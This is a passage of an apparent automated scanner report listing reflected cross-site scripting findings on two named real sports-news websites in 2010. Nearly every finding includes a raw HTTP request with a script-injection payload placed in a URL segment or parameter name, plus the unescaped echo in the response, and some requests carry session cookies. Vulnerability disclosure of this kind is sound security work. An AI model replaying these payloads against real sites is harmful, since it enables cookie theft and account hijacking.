This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Urban-Renterias-comments-wrong-in-every-85ab2"><script>alert(1)</script>c66f7de0b0d/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40245
Content-Type: text/html
Set-Cookie: PHPSESSID=940f044b17dfcf494474c7a627998fb0; path=/
Expires: Sun, 19 Dec 2010 18:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:12:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/Urban-Renterias-comments-wrong-in-every-85ab2"><script>alert(1)</script>c66f7de0b0d/landing_urban_v3.html">
...[SNIP]...

2.228. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ed7d"><script>alert(1)</script>67cb3a41014 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C7ed7d"><script>alert(1)</script>67cb3a41014/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C7ed7d"><script>alert(1)</script>67cb3a41014/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.229. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e51"><script>alert(1)</script>0d5c9babaf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae74051e51"><script>alert(1)</script>0d5c9babaf1/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae74051e51"><script>alert(1)</script>0d5c9babaf1/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.230. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c95"><script>alert(1)</script>31f08011031 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17e5c95"><script>alert(1)</script>31f08011031/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17e5c95"><script>alert(1)</script>31f08011031/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.231. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 358b2"><script>alert(1)</script>d0de32d96b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10358b2"><script>alert(1)</script>d0de32d96b3/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40295
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10358b2"><script>alert(1)</script>d0de32d96b3/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html">
...[SNIP]...

2.232. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd16"><script>alert(1)</script>95264bab223 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-4fd16"><script>alert(1)</script>95264bab223/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 40314
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-4fd16"><script>alert(1)</script>95264bab223/landing_urban_v3.html">
...[SNIP]...

2.233. http://www.csnbayarea.com/pages/landing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/landing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf79"><script>alert(1)</script>0bab4ba8ccc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing?1cf79"><script>alert(1)</script>0bab4ba8ccc=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 51177
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="1cf79"><script>alert(1)</script>0bab4ba8ccc" id = "1cf79">
...[SNIP]...

2.234. http://www.csnbayarea.com/pages/profiles [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bae73"><script>alert(1)</script>36ec9c80c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/profiles?bae73"><script>alert(1)</script>36ec9c80c16=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 52908
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="bae73"><script>alert(1)</script>36ec9c80c16" id = "bae73">
...[SNIP]...

2.235. http://www.csnbayarea.com/pages/video [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbayarea.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7398"><script>alert(1)</script>58cec5b7caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?f7398"><script>alert(1)</script>58cec5b7caa=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 76152
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="f7398"><script>alert(1)</script>58cec5b7caa" id = "f7398">
...[SNIP]...

2.236. http://www.csncalifornia.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13b5a"><script>alert(1)</script>20777afd731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?13b5a"><script>alert(1)</script>20777afd731=1 HTTP/1.1
Host: www.csncalifornia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:01 GMT
Connection: close
Set-Cookie: PHPSESSID=7ec6ef4cff790030950ccceec1a36f22; path=/
Content-Length: 98170

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="13b5a"><script>alert(1)</script>20777afd731" id = "13b5a">
...[SNIP]...

2.237. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d407"><script>alert(1)</script>b63af54bf8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /111d407"><script>alert(1)</script>b63af54bf8e/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/111d407"><script>alert(1)</script>b63af54bf8e/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.238. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce80c"><script>alert(1)</script>e0e2993fc81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22ce80c"><script>alert(1)</script>e0e2993fc81/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22ce80c"><script>alert(1)</script>e0e2993fc81/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.239. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef888"><script>alert(1)</script>c0087ef2dd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10ef888"><script>alert(1)</script>c0087ef2dd5/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22/10ef888"><script>alert(1)</script>c0087ef2dd5/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html">
...[SNIP]...

2.240. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1d4"><script>alert(1)</script>e7c9caf2624 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE4c1d4"><script>alert(1)</script>e7c9caf2624/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE4c1d4"><script>alert(1)</script>e7c9caf2624/landing.html">
...[SNIP]...

2.241. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ead4d"><script>alert(1)</script>92c61a9dd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html?ead4d"><script>alert(1)</script>92c61a9dd4f=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51651

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="ead4d"><script>alert(1)</script>92c61a9dd4f" id = "ead4d">
...[SNIP]...

2.242. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2e20"><script>alert(1)</script>337775cf04b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12c2e20"><script>alert(1)</script>337775cf04b/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
